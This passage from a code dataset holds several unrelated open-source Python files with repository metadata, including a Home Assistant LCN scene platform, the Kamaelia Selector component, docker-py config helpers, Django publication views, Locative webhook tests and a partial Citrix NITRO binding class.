CONF_DOMAIN_DATA,
CONF_OUTPUTS,
CONF_REGISTER,
CONF_TRANSITION,
OUTPUT_PORTS,
)
from .helpers import get_device_connection
PARALLEL_UPDATES = 0
def create_lcn_scene_entity(hass, entity_config, config_entry):
"""Set up an entity for this domain."""
device_connection = get_device_connection(
hass, tuple(entity_config[CONF_ADDRESS]), config_entry
)
return LcnScene(entity_config, config_entry.entry_id, device_connection)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up LCN switch entities from a config entry."""
entities = []
for entity_config in config_entry.data[CONF_ENTITIES]:
if entity_config[CONF_DOMAIN] == DOMAIN_SCENE:
entities.append(create_lcn_scene_entity(hass, entity_config, config_entry))
async_add_entities(entities)
class LcnScene(LcnEntity, Scene):
"""Representation of a LCN scene."""
def __init__(self, config, entry_id, device_connection):
"""Initialize the LCN scene."""
super().__init__(config, entry_id, device_connection)
self.register_id = config[CONF_DOMAIN_DATA][CONF_REGISTER]
self.scene_id = config[CONF_DOMAIN_DATA][CONF_SCENE]
self.output_ports = []
self.relay_ports = []
for port in config[CONF_DOMAIN_DATA][CONF_OUTPUTS]:
if port in OUTPUT_PORTS:
self.output_ports.append(pypck.lcn_defs.OutputPort[port])
            else:  # in RELAY_PORTS
self.relay_ports.append(pypck.lcn_defs.RelayPort[port])
if config[CONF_DOMAIN_DATA][CONF_TRANSITION] is None:
self.transition = None
else:
self.transition = pypck.lcn_defs.time_to_ramp_value(
config[CONF_DOMAIN_DATA][CONF_TRANSITION]
)
async def async_activate(self, **kwargs):
"""Activate scene."""
await self.device_connection.activate_scene(
self.register_id,
self.scene_id,
self.output_ports,
self.relay_ports,
self.transition,
)
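For orientation, the constructor above reads a per-entity config dict. The hypothetical example below sketches its shape; the literal key strings are assumptions about the values of the imported CONF_* constants, and the address and port values are made up:

    example_entity_config = {
        "address": [0, 7, False],              # CONF_ADDRESS
        "domain": "scene",                     # CONF_DOMAIN
        "domain_data": {                       # CONF_DOMAIN_DATA
            "register": 0,                     # CONF_REGISTER
            "scene": 2,                        # CONF_SCENE
            "outputs": ["OUTPUT1", "RELAY3"],  # CONF_OUTPUTS: output and relay ports
            "transition": 5.0,                 # CONF_TRANSITION: seconds, or None for no ramp
        },
    }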
| w1ll1am23/home-assistant | homeassistant/components/lcn/scene.py | Python | apache-2.0 | 2,350 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FIXME: This doesn't really provide a means for people to ask for
# the service and release the service. The problem this
# causes is that the selector has no simple means of shutting
# down when no one is using it.
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
"""\
======================================
NOTIFICATION OF SOCKET AND FILE EVENTS
======================================
The Selector component listens for events on sockets and sends out notifications.
It is effectively a wrapper around the unix 'select' call. Components
request that the Selector component notify them when a supplied socket or file
object is ready.
The selectorComponent is a service that registers with the Coordinating
Assistant Tracker (CAT).
NOTE: The behaviour and API of this component changed in Kamaelia 0.4 and is
likely to change again in the near future.
Example Usage
-------------
See the source code for TCPClient for an example of how the Selector component
can be used.
How does it work?
-----------------
Selector is a service. Obtain it by calling the static method
Selector.getSelectorService(...). Any existing instance will be returned,
otherwise a new one is automatically created.
This component ignores anything sent to its "inbox" and "control" inboxes. This
component does not terminate.
Register socket or file objects with the selector, to receive a one-shot
notification when that file descriptor is ready. The file descriptor can be
a python file object or socket object. The notification is one-shot - meaning
you must resubmit your request every time you wish to receive a notification.
Ensure you deregister the file object when closing the file/socket. You may do
this even if you have already received the notification. The Selector component
will be unable to handle notifications for any other descriptors if it still has
a registered descriptor that has closed.
Register for a notification by sending one of the following messages to the
"notify" inbox, as returned by Selector.getSelectorService():
* Kamaelia.KamaeliaIpc.newReader( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.newWriter( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.newExceptional( (component,inboxname), descriptor)
Choose which as appropriate:
* a newReader() request will notify when there is data ready to be read on
the descriptor
* a newWriter() request will notify when writing to the descriptor will not
block.
* a newExceptional() request will notify when an exceptional event occurs on
the specified descriptor.
Selector will notify the target component by sending the file/socket descriptor
object to the target inbox the component provided. It then automatically
deregisters the descriptor, unlinking from the target component's inbox.
For a given descriptor for a given type of event (read/write/exceptional) only
one notification will be sent when the event occurs. If multiple notification
requests have been received, only the first is listened to; all others are
ignored.
Of course, once the notification has happened, or someone has requested that
descriptor be deregistered, then someone can register for it once again.
Deregister by sending one of the following messages to the "notify" inbox of
Selector:
* Kamaelia.KamaeliaIpc.removeReader( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.removeWriter( (component,inboxname), descriptor)
* Kamaelia.KamaeliaIpc.removeExceptional( (component,inboxname), descriptor)
It is advisable to send a deregister message when the corresponding file
descriptor closes, in case you registered for a notification, but it has not
occurred.
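A rough sketch of how a client registers, assuming it already has an outbox
(here called "selectorNotify") linked to the Selector service's "notify" inbox
and an open socket 'sock' (the inbox and outbox names are illustrative):

    from Kamaelia.IPC import newReader

    self.send(newReader((self, "readready"), sock), "selectorNotify")
    # when 'sock' becomes readable it is delivered to our "readready" inbox;
    # notifications are one-shot, so re-register to keep listening, and
    # deregister (see the remove* messages above) when closing the socket.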
"""
import Axon
from Axon.Ipc import shutdown
import select, socket
from Kamaelia.IPC import newReader, removeReader, newWriter, removeWriter, newExceptional, removeExceptional
import Axon.CoordinatingAssistantTracker as cat
from Axon.ThreadedComponent import threadedadaptivecommscomponent
import time
#import sys,traceback
READERS,WRITERS, EXCEPTIONALS = 0, 1, 2
FAILHARD = False
timeout = 5
from Axon.Component import component
class _SelectorCore(threadedadaptivecommscomponent): #Axon.AdaptiveCommsComponent.AdaptiveCommsComponent): # SmokeTests_Selector.test_SmokeTest
"""\
Selector() -> new Selector component
Use Selector.getSelectorService(...) in preference as it returns an
existing instance, or automatically creates a new one.
"""
Inboxes = {
"control" : "Recieving a Axon.Ipc.shutdown() message here causes shutdown",
"inbox" : "Not used at present",
"notify" : "Used to be notified about things to select"
}
def __init__(self,notifySocket=None):
super(_SelectorCore, self).__init__()
self.minSelectables = 0
self.notifySocket = notifySocket
if self.notifySocket:
self.minSelectables += 1
def removeLinks(self, selectable, meta, selectables):
"""\
Removes a file descriptor (selectable).
Removes the corresponding entry from meta and selectables; unlinks from
the component to be notified; and deletes the corresponding outbox.
"""
# \
#print "removeLinks",selectable,meta,selectables
try:
replyService, outbox, Linkage = meta[selectable]
self.unlink(thelinkage=Linkage)
selectables.remove(selectable)
self.deleteOutbox(outbox)
del meta[selectable]
Linkage = None
except:
pass
def addLinks(self, replyService, selectable, meta, selectables, boxBase):
"""\
Adds a file descriptor (selectable).
Creates a corresponding outbox, with name based on boxBase; links it to
the component that wants to be notified; adds the file descriptor to the
set of selectables; and records the box and linkage info in meta.
"""
if selectable not in meta:
outbox = self.addOutbox(boxBase)
L = self.link((self, outbox), replyService)
meta[selectable] = replyService, outbox, L
selectables.append(selectable)
return L
else:
return meta[selectable][2]
def handleNotify(self, meta, readers,writers, exceptionals):
"""\
Process requests to add and remove file descriptors (selectables) that
arrive at the "notify" inbox.
"""
while self.dataReady("notify"):
message = self.recv("notify")
# \
#print type(message)
if isinstance(message, newReader):
replyService, selectable = message.object
L = self.addLinks(replyService, selectable, meta[READERS], readers, "readerNotify")
L.showtransit = 0
if isinstance(message, newWriter):
replyService, selectable = message.object
L = self.addLinks(replyService, selectable, meta[WRITERS], writers, "writerNotify")
L.showtransit = 0
if isinstance(message, newExceptional):
replyService, selectable = message.object
self.addLinks(replyService, selectable, meta[EXCEPTIONALS], exceptionals, "exceptionalNotify")
if isinstance(message, removeReader):
selectable = message.object
self.removeLinks(selectable, meta[READERS], readers)
if isinstance(message, removeWriter):
selectable = message.object
self.removeLinks(selectable, meta[WRITERS], writers)
if isinstance(message, removeExceptional):
selectable = message.object
self.removeLinks(selectable, meta[EXCEPTIONALS], exceptionals)
def main(self):
"""Main loop"""
global timeout
readers,writers, exceptionals = [],[], []
if self.notifySocket:
readers.append(self.notifySocket)
selections = [readers,writers, exceptionals]
meta = [ {}, {}, {} ]
if not self.anyReady():
self.sync() # momentary pause-ish thing
last = 0
numberOfFailedSelectsDueToBadFileDescriptor = 0
shuttingDown = False
while 1: # SmokeTests_Selector.test_RunsForever
if self.dataReady("control"):
message = self.recv("control")
if isinstance(message,shutdown):
# print "recieved shutdown message"
shutdownStart = time.time()
timeWithNooneUsing = 0
shuttingDown = True
if shuttingDown:
# print "we're shutting down"
                if len(readers) + len(writers) + len(exceptionals) <= self.minSelectables: # always have at least the wakeup socket
if timeWithNooneUsing == 0:
# print "starting timeout"
timeWithNooneUsing = time.time()
else:
if time.time() - timeWithNooneUsing > timeout:
# print "Yay, timed out!"
break # exit the loop
else:
                    timeWithNooneUsing = 0 # reset this to zero if readers/writers/excepts goes up again...
# else:
# print "But someone is still using us...."
# print readers, writers, exceptionals
self.handleNotify(meta, readers,writers, exceptionals)
if len(readers) + len(writers) + len(exceptionals) > 0:
# print len(readers),len(writers),len(exceptionals)
try:
read_write_except = select.select(readers, writers, exceptionals,5) #0.05
numberOfFailedSelectsDueToBadFileDescriptor = 0
for i in xrange(3):
for selectable in read_write_except[i]:
try:
replyService, outbox, linkage = meta[i][selectable]
self.send(selectable, outbox)
replyService, outbox, linkage = None, None, None
# Note we remove the selectable until we know the reason for it being here has cleared.
self.removeLinks(selectable, meta[i], selections[i])
except KeyError, k:
# must be the wakeup signal, don't remove it or act on it
selectable.recv(1024)
except ValueError, e:
if FAILHARD:
raise e
except socket.error, e:
if e[0] == 9:
numberOfFailedSelectsDueToBadFileDescriptor +=1
if numberOfFailedSelectsDueToBadFileDescriptor > 1000:
# For the moment, we simply raise an exception.
# We could brute force our way through the list of descriptors
# to find the broken ones, and remove
raise e
self.sync()
elif not self.anyReady():
self.pause() # momentary pause-ish thing
# else:
# print "HMM"
## print "SELECTOR HAS EXITTED"
class Selector(component):
Inboxes = {
"control" : "Recieving a Axon.Ipc.shutdown() message here causes shutdown",
"inbox" : "Not used at present",
"notify" : "Used to be notified about things to select",
"_sink" : "For dummy notifications from selector",
}
Outboxes = {
"outbox" : "",
"signal" : "",
"_toNotify" : "Forwarding of messages to notify inbox of actual selector",
"_toControl" : "Forwarding of messages to control inbox of actual selector",
}
def __init__(self):
super(Selector, self).__init__()
self.trackedby = None
def trackedBy(self, tracker):
self.trackedby = tracker
def main(self):
self.notifySocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.notifySocket.setblocking(False)
self.notifySocket.bind(("127.0.0.1",1678))
self.notifySocket.connect(("127.0.0.1",1678))
self.selector = _SelectorCore(self.notifySocket)
self.addChildren(self.selector)
self.selector.activate()
self.link((self,"_toNotify"),(self.selector, "notify"))
self.link((self,"_toControl"),(self.selector, "control"))
# self.send( newReader( (self,"_sink"), self.notifySocket), "_toNotify")
shutdownMessage = shutdown()
while not self.childrenDone():
if not self.anyReady():
self.pause()
yield 1
wakeSelector=False
while self.dataReady("notify"):
message=self.recv("notify")
self.send(message, "_toNotify")
wakeSelector=True
while self.dataReady("control"):
message = self.recv("control")
if isinstance(message,shutdown):
if self.trackedby is not None:
# print "we are indeed tracked"
self.trackedby.deRegisterService("selector")
self.trackedby.deRegisterService("selectorshutdown")
self.send(message, "_toControl")
shutdownMessage=message
wakeSelector=True
if wakeSelector:
self.notifySocket.send("X")
self.send(shutdownMessage, "signal")
def childrenDone(self):
"""Unplugs any children that have terminated, and returns true if there are no
running child components left (ie. their microproceses have finished)
"""
for child in self.childComponents():
if child._isStopped():
self.removeChild(child) # deregisters linkages for us
return 0==len(self.childComponents())
def setSelectorServices(selector, tracker = None):
"""\
Sets the given selector as the service for the selected tracker or the
default one.
(static method)
"""
if not tracker:
tracker = cat.coordinatingassistanttracker.getcat()
tracker.registerService("selector", selector, "notify")
tracker.registerService("selectorshutdown", selector, "control")
selector.trackedBy(tracker)
setSelectorServices = staticmethod(setSelectorServices)
def getSelectorServices(tracker=None): # STATIC METHOD
"""\
Returns any live selector registered with the specified (or default) tracker,
or creates one for the system to use.
(static method)
"""
if tracker is None:
tracker = cat.coordinatingassistanttracker.getcat()
try:
service = tracker.retrieveService("selector")
shutdownservice = tracker.retrieveService("selectorshutdown")
return service, shutdownservice, None
except KeyError:
selector = Selector()
Selector.setSelectorServices(selector, tracker)
service=(selector,"notify")
shutdownservice=(selector,"control")
return service, shutdownservice, selector
getSelectorServices = staticmethod(getSelectorServices)
__kamaelia_components__ = ( Selector, )
|
sparkslabs/kamaelia_
|
Sketches/MH/RTP/Selector.py
|
Python
|
apache-2.0
| 16,564
|
import json
import sys
import ethereum.testutils as testutils
from ethereum.slogging import get_logger, configure_logging
logger = get_logger()
# customize VM log output to your needs
# hint: use 'py.test' with the '-s' option to dump logs to the console
if '--trace' in sys.argv: # not default
configure_logging(':trace')
    sys.argv.remove('--trace')
def test_vm(filename, testname, testdata):
testutils.check_vm_test(testutils.fixture_to_bytes(testdata))
def pytest_generate_tests(metafunc):
testutils.generate_test_params('VMTests', metafunc)
def main():
if len(sys.argv) == 1:
# read fixture from stdin
fixtures = {'stdin': json.load(sys.stdin)}
else:
# load fixtures from specified file or dir
try:
fixtures = testutils.get_tests_from_file_or_dir(sys.argv[1])
except:
fixtures = {'stdin': json.loads(sys.argv[1])}
for filename, tests in list(fixtures.items()):
for testname, testdata in list(tests.items()):
if len(sys.argv) < 3 or testname == sys.argv[2]:
print("Testing: %s %s" % (filename, testname))
testutils.check_vm_test(testdata)
if __name__ == '__main__':
main()
|
EthereumWebhooks/blockhooks
|
lib/ethereum/tests/test_vm.py
|
Python
|
apache-2.0
| 1,230
|
from keystone import utils
from keystone.common import wsgi
from keystone.logic.types.service import Service
import keystone.config as config
from . import get_marker_limit_and_url
class ServicesController(wsgi.Controller):
"""Controller for Service related operations"""
def __init__(self, options):
self.options = options
@utils.wrap_error
def create_service(self, req):
service = utils.get_normalized_request_content(Service, req)
return utils.send_result(201, req,
config.SERVICE.create_service(utils.get_auth_token(req), service))
@utils.wrap_error
def get_services(self, req):
marker, limit, url = get_marker_limit_and_url(req)
services = config.SERVICE.get_services(
utils.get_auth_token(req), marker, limit, url)
return utils.send_result(200, req, services)
@utils.wrap_error
def get_service(self, req, service_id):
service = config.SERVICE.get_service(
utils.get_auth_token(req), service_id)
return utils.send_result(200, req, service)
@utils.wrap_error
def delete_service(self, req, service_id):
rval = config.SERVICE.delete_service(utils.get_auth_token(req),
service_id)
return utils.send_result(204, req, rval)
|
ntt-pf-lab/backup_keystone
|
keystone/controllers/services.py
|
Python
|
apache-2.0
| 1,298
|
import json
import logging
import os
from ..constants import IS_WINDOWS_PLATFORM
DOCKER_CONFIG_FILENAME = os.path.join('.docker', 'config.json')
LEGACY_DOCKER_CONFIG_FILENAME = '.dockercfg'
log = logging.getLogger(__name__)
def find_config_file(config_path=None):
paths = list(filter(None, [
config_path, # 1
config_path_from_environment(), # 2
os.path.join(home_dir(), DOCKER_CONFIG_FILENAME), # 3
os.path.join(home_dir(), LEGACY_DOCKER_CONFIG_FILENAME), # 4
]))
log.debug(f"Trying paths: {repr(paths)}")
for path in paths:
if os.path.exists(path):
log.debug(f"Found file at path: {path}")
return path
log.debug("No config file found")
return None
def config_path_from_environment():
config_dir = os.environ.get('DOCKER_CONFIG')
if not config_dir:
return None
return os.path.join(config_dir, os.path.basename(DOCKER_CONFIG_FILENAME))
def home_dir():
"""
Get the user's home directory, using the same logic as the Docker Engine
client - use %USERPROFILE% on Windows, $HOME/getuid on POSIX.
"""
if IS_WINDOWS_PLATFORM:
return os.environ.get('USERPROFILE', '')
else:
return os.path.expanduser('~')
def load_general_config(config_path=None):
config_file = find_config_file(config_path)
if not config_file:
return {}
try:
with open(config_file) as f:
return json.load(f)
except (OSError, ValueError) as e:
# In the case of a legacy `.dockercfg` file, we won't
# be able to load any JSON data.
log.debug(e)
log.debug("All parsing attempts failed - returning empty config")
return {}
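# Illustrative usage (hypothetical caller code, not part of this module): the
# helpers above are typically combined as below; keys such as 'auths' are only
# present in some config files, so callers should treat them as optional.
#
#     cfg = load_general_config()      # searches the candidate paths from find_config_file()
#     auths = cfg.get('auths', {})     # empty dict when no config file or key was found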
|
vdemeester/docker-py
|
docker/utils/config.py
|
Python
|
apache-2.0
| 1,724
|
from django.shortcuts import render
from django.core import serializers
import json
import datetime
import os
from django.http import HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.conf import settings
from publisher.models import Publication
from registrar.models import PeerReview
from publisher.forms import PublicationForm
@login_required(login_url='/landpage')
def my_publications_page(request):
try:
publications = Publication.objects.filter(author=request.user)
except Publication.DoesNotExist:
publications = None
return render(request, 'publisher/my_publication/view.html',{
'publications': publications,
'user': request.user,
'tab': 'my_publications',
'HAS_ADVERTISMENT': settings.APPLICATION_HAS_ADVERTISMENT,
'local_css_urls': settings.SB_ADMIN_2_CSS_LIBRARY_URLS,
'local_js_urls': settings.SB_ADMIN_2_JS_LIBRARY_URLS
})
@login_required()
def refresh_publications_table(request):
try:
publications = Publication.objects.filter(author=request.user)
except Publication.DoesNotExist:
publications = None
return render(request, 'publisher/my_publication/table.html',{
'publications': publications,
'user': request.user,
'tab': 'my_publications',
'local_css_urls': settings.SB_ADMIN_2_CSS_LIBRARY_URLS,
'local_js_urls': settings.SB_ADMIN_2_JS_LIBRARY_URLS
})
@login_required()
def my_publication_modal(request):
if request.method == u'POST':
form = None
publication_id = int(request.POST['publication_id'])
if publication_id > 0:
upload = Publication.objects.get(publication_id=publication_id)
form = PublicationForm(instance=upload)
else:
form = PublicationForm()
return render(request, 'publisher/my_publication/modal.html',{
'form': form,
})
@login_required()
def save_publication(request):
response_data = {'status' : 'failed', 'message' : 'unknown error with saving'}
if request.is_ajax():
if request.method == 'POST':
publication_id = int(request.POST['publication_id'])
form = PublicationForm(request.POST, request.FILES)
# If publication already exists, then delete local file.
if publication_id > 0:
# Delete previous file.
try:
upload = Publication.objects.get(publication_id=publication_id)
except Publication.DoesNotExist:
return HttpResponse(json.dumps({
'status' : 'failed', 'message' : 'record does not exist'
}), content_type="application/json")
if upload.file:
if os.path.isfile(upload.file.path):
os.remove(upload.file.path)
upload.file = None
upload.save()
form.instance = upload
# Save if valid
form.instance.author = request.user
if form.is_valid():
form.save()
response_data = {'status' : 'success', 'message' : 'saved'}
else:
response_data = {'status' : 'failed', 'message' : json.dumps(form.errors)}
return HttpResponse(json.dumps(response_data), content_type="application/json")
@login_required()
def delete_publication(request):
response_data = {'status' : 'failed', 'message' : 'unknown error with deleting'}
if request.is_ajax():
if request.method == 'POST':
publication_id = int(request.POST['publication_id'])
try:
publication = Publication.objects.get(publication_id=publication_id)
for peer_review in publication.reviews.all():
peer_review.delete()
publication.delete()
response_data = {'status' : 'success', 'message' : 'deleted'}
except Publication.DoesNotExist:
response_data = {'status' : 'failed', 'message' : 'record not found'}
return HttpResponse(json.dumps(response_data), content_type="application/json")
|
AcademicsToday/py-academicstoday
|
academicstoday_project/publisher/views/my_publication.py
|
Python
|
apache-2.0
| 4,339
|
"""The tests the for Locative device tracker platform."""
from unittest.mock import Mock, patch
import pytest
from homeassistant import data_entry_flow
from homeassistant.components import locative
from homeassistant.components.device_tracker import DOMAIN as DEVICE_TRACKER_DOMAIN
from homeassistant.components.locative import DOMAIN, TRACKER_UPDATE
from homeassistant.const import HTTP_OK, HTTP_UNPROCESSABLE_ENTITY
from homeassistant.helpers.dispatcher import DATA_DISPATCHER
from homeassistant.setup import async_setup_component
# pylint: disable=redefined-outer-name
@pytest.fixture(autouse=True)
def mock_dev_track(mock_device_tracker_conf):
"""Mock device tracker config loading."""
pass
@pytest.fixture
async def locative_client(loop, hass, hass_client):
"""Locative mock client."""
assert await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
await hass.async_block_till_done()
with patch("homeassistant.components.device_tracker.legacy.update_config"):
return await hass_client()
@pytest.fixture
async def webhook_id(hass, locative_client):
"""Initialize the Geofency component and get the webhook_id."""
hass.config.api = Mock(base_url="http://example.com")
result = await hass.config_entries.flow.async_init(
"locative", context={"source": "user"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM, result
result = await hass.config_entries.flow.async_configure(result["flow_id"], {})
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
await hass.async_block_till_done()
return result["result"].data["webhook_id"]
async def test_missing_data(locative_client, webhook_id):
"""Test missing data."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 1.0,
"longitude": 1.1,
"device": "123",
"id": "Home",
"trigger": "enter",
}
# No data
req = await locative_client.post(url)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No latitude
copy = data.copy()
del copy["latitude"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No device
copy = data.copy()
del copy["device"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No location
copy = data.copy()
del copy["id"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No trigger
copy = data.copy()
del copy["trigger"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# Test message
copy = data.copy()
copy["trigger"] = "test"
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Test message, no location
copy = data.copy()
copy["trigger"] = "test"
del copy["id"]
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Unknown trigger
copy = data.copy()
copy["trigger"] = "foobar"
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
async def test_enter_and_exit(hass, locative_client, webhook_id):
"""Test when there is a known zone."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "123",
"id": "Home",
"trigger": "enter",
}
# Enter the Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "home"
data["id"] = "HOME"
data["trigger"] = "exit"
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "not_home"
data["id"] = "hOmE"
data["trigger"] = "enter"
# Enter Home again
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "home"
data["trigger"] = "exit"
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "not_home"
data["id"] = "work"
data["trigger"] = "enter"
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"])
).state
assert state_name == "work"
async def test_exit_after_enter(hass, locative_client, webhook_id):
"""Test when an exit message comes after an enter message."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "123",
"id": "Home",
"trigger": "enter",
}
# Enter Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "home"
data["id"] = "Work"
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "work"
data["id"] = "Home"
data["trigger"] = "exit"
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "work"
async def test_exit_first(hass, locative_client, webhook_id):
"""Test when an exit message is sent first on a new device."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "new_device",
"id": "Home",
"trigger": "exit",
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "not_home"
async def test_two_devices(hass, locative_client, webhook_id):
"""Test updating two different devices."""
url = "/api/webhook/{}".format(webhook_id)
data_device_1 = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "device_1",
"id": "Home",
"trigger": "exit",
}
# Exit Home
req = await locative_client.post(url, data=data_device_1)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data_device_1["device"])
)
assert state.state == "not_home"
# Enter Home
data_device_2 = dict(data_device_1)
data_device_2["device"] = "device_2"
data_device_2["trigger"] = "enter"
req = await locative_client.post(url, data=data_device_2)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data_device_2["device"])
)
assert state.state == "home"
state = hass.states.get(
"{}.{}".format(DEVICE_TRACKER_DOMAIN, data_device_1["device"])
)
assert state.state == "not_home"
@pytest.mark.xfail(
reason="The device_tracker component does not support unloading yet."
)
async def test_load_unload_entry(hass, locative_client, webhook_id):
"""Test that the appropriate dispatch signals are added and removed."""
url = "/api/webhook/{}".format(webhook_id)
data = {
"latitude": 40.7855,
"longitude": -111.7367,
"device": "new_device",
"id": "Home",
"trigger": "exit",
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get("{}.{}".format(DEVICE_TRACKER_DOMAIN, data["device"]))
assert state.state == "not_home"
assert len(hass.data[DATA_DISPATCHER][TRACKER_UPDATE]) == 1
entry = hass.config_entries.async_entries(DOMAIN)[0]
await locative.async_unload_entry(hass, entry)
await hass.async_block_till_done()
assert not hass.data[DATA_DISPATCHER][TRACKER_UPDATE]
|
leppa/home-assistant
|
tests/components/locative/test_init.py
|
Python
|
apache-2.0
| 9,135
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class autoscalepolicy_nstimer_binding(base_resource) :
""" Binding class showing the nstimer that can be bound to autoscalepolicy.
"""
def __init__(self) :
self._boundto = ""
self._priority = 0
self._activepolicy = 0
self._gotopriorityexpression = ""
self._name = ""
self.___count = 0
@property
def name(self) :
ur"""The name of the autoscale policy.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
ur"""The name of the autoscale policy.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def boundto(self) :
ur"""Location where policy is bound.
"""
try :
return self._boundto
except Exception as e:
raise e
@boundto.setter
def boundto(self, boundto) :
ur"""Location where policy is bound.
"""
try :
self._boundto = boundto
except Exception as e:
raise e
@property
def priority(self) :
ur"""Specifies the priority of the policy.
"""
try :
return self._priority
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
ur"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@property
def activepolicy(self) :
ur"""Indicates whether policy is bound or not.
"""
try :
return self._activepolicy
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(autoscalepolicy_nstimer_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.autoscalepolicy_nstimer_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name) :
ur""" Use this API to fetch autoscalepolicy_nstimer_binding resources.
"""
try :
obj = autoscalepolicy_nstimer_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
